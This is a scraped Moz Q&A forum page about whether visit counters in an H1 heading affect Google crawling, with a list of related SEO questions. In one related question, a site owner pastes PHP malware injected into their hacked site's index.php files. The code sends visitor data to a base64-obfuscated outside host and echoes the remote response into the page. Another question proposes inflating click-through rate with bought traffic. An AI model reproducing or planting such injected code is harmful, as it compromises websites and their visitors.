Hits in H1 will improve ranking by regular crawling ?
-
Hello !
I was wondering if it's a good idea to keep the "Hits" in the H1 ?
http://www.ibremarketing.com/item/netapp-e5400-storage-system.html
Will Google come to check regularly the update (new information if I'm right) or if he will not like the idea to come back just for hits update.
As I have very good results on this part of the website, I do not want to take any risk.
Thanks a lot !
-
You're right
-
The issue I have is that I have few visit on each page. So it's gonna be very difficult to see if there is any change.
** Even so - you can still track the rankings...
-
Mum ... so as it's going quite well now. I think I gonna let it like that.
The issue I have is that I have few visit on each page. So it's gonna be very difficult to see if there is any change.
This is why I was looking for some elements into our favorite forum
tks for your help
-
HI,
So better to remove the Hits from the h1 ?
** From outside I would say yes. However, again, I would say you should test on a few "test subject" and then decide - it's always room for improvement and you might find that it has some benefits
Cheers.
-
Hello
Yes you're right. So better to remove the Hits from the h1 ?
-
Hi,
Maybe I am wrong but the sample you've provided can be part of "ever green content" that is the same now and in 2 years or is content based on queries that deserve freshness ? I would say is kind of in the "ever green content" and if so Google won't get back regularly to check if updates are made - also base don the pages change rate in the first days/weeks/months of life.
Maybe I got your question wrong though but the basic idea is to play safe, don't go into really tiny micromanagement and always test in a few pages and if it works go wide
Not really helpful I know
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
How to stop google bot from crawling spammy injected pages by hacker?
Hello, Please help me. Our one of website is under attack by hacker once again. They have injected spammy URL and google is indexing, but we could not find these pages on our website. These all are 404 Pages. Our website is not secured. No HTTPS Our website is using wordpress CMS Thanks
White Hat / Black Hat SEO | | ShahzadAhmed0 -
Besides description and design optimization, is there any other main factor that we can influence to get better App Store rankings?
Hi there! I do love SEO, the cracking Web Search engine, but when it comes to other Google's search engines like Youtube and Apps Store it's an unknown field for me.
White Hat / Black Hat SEO | | Gaston Riera
So, i'm diving into App Store Optimization, ASO. This is my question: Besides the text and the design in the description of the app, is there any other factor that we can manipulate or influence?(such as linkbuilding, social media or alien magic hehe). Thanks a lot!
GR.0 -
Still seeing a terrible rank drop after last algo update?!
I'm still stumped as to why the ranking has gone so poor on a whitehat site. (see attached image) As you can see we've steadily been improving the ranking over the last 6+ months and then got hit with a massive change this month... I can't physically see any issues and Moz isn't reporting anything negatively that would have such a major effect.. Like not as if the drops were subtle... they've all gone into the 50+ section! Any insights into what may have changed in the latest algo update would be appreciated?! S0sD7d8.png
White Hat / Black Hat SEO | | snowflake740 -
Trying to escape from Google algorithm ranking drop
in 2010 our website was ranking number 1 for many keywords. we suddenly saw a crash in this a few years ago. we have since identified we have been hit by many shades of Panda and penguin updates. Mainly due to low quality back-links and poor content (some duplicates). since then we have done a major overhaul of our backlink profile. We have saved rankings that went from number 1 for many keywords to number 60 -70. We are now placed at around 11 to 18 rankings. We have also looked at our duplicate content issues, and removed all duplicate content, introduced a blog for fresh bi daily updates in an attempt to gain traffic. We also amalgamated many small low quality pages to larger higher quality content pages. we are now mobile friendly with a dynamic site, and our site speed is good (around 80). we have switched to https, and also upgraded our website for better conversions. we have looked at the technical issues of the site and don't have many major issues, although we do have 404's coming up in the google webmaster tools for old pages we removed due to duplicate content. we are link building at a pace of around 40 mentions a month. some are no follow, some do follow and some no links. We are diversifying links to include branding in addition to target keywords. We have pretty much exhausted every avenue we can think of now, but we cannot jump over to page 1 for any significant keywords we are targeting. Our competitor websites are not that powerful, and metrics are similar to ours if not lower. 1. please can you advise anything else you can think of that we should look at. 2. we are even considering going to a new domain and 301'ing all pages to this domain in an attempt to shake off the algorithm filter (penalties). has anyone done this? how long can we expect to get at least the same ranking for the new domain if 301 all urls to it? do you think its worth it? we know the risk of doing this, and so wanted to seek some advice. 3. we have on the other hand considered the fact that we have disavowed so many links (70%) that this could be a cause of the page two problem, however we are link building according to moz metric standards and majestic standards with no benefit.. do you think we should increase link building? Advice is appreciated!
White Hat / Black Hat SEO | | Direct_Ram0 -
Black hat : raising CTR to have better rank in Google
We all know that Google uses click-through-rate (CTR) as one of it is ranking factor. I came up with an idea in my mind. I would like to see if someone saw this idea before or tried it. If you search in Google for the term "SEO" for example. You will see the moz.com website in rank 3. And if you checked the source code you will see that result 3 is linking to this url: https://www.google.com.sa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&ved=0CDMQFjAC&url=https%3A%2F%2Fmoz.com%2Fbeginners-guide-to-seo&ei=F-pPVaDZBoSp7Abo_IDYAg&usg=AFQjCNEwiTCgNNNWInUJNibqiJCnlqcYtw That url will redirect you to seomoz.com Ok, what if we use linkbucks.com or any other cheap targeted traffic network and have a campaign that sends traffic to the url that I show you. Will that count as traffic from Google so it will increase the CTR from Google?
White Hat / Black Hat SEO | | Mohtaref11 -
Site that's 301 redirected is ranking for brand
We own a number of foreign TLD domains for our brand. They are all 301-redirected to our main .com branded domain. One of them is appearing in our branded search results, outranking out main .com page. To be clear, this is despite there being a 301 redirect from it to the .com page. Any ideas on what is going on here?
White Hat / Black Hat SEO | | ipancake0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Multiple H1 tags are OK according to developer. I have my doubts. Please advise...
Hi, My very well known and widely respected developer is using multiple H1 tags I see - they like using them in their code and they argue multiple H1s conform with HTML5 standards. They are resisting a recode to one H1 tag per page. However, I know this is clearly an issue in Bing, so I don't want to risk it with Google. Any thoughts on whether it's best to avoid multiple H1 tags in Google (any evidence and reasoning would be great - I can then put that to my developer...) Many thanks for your help, Luke
White Hat / Black Hat SEO | | McTaggart0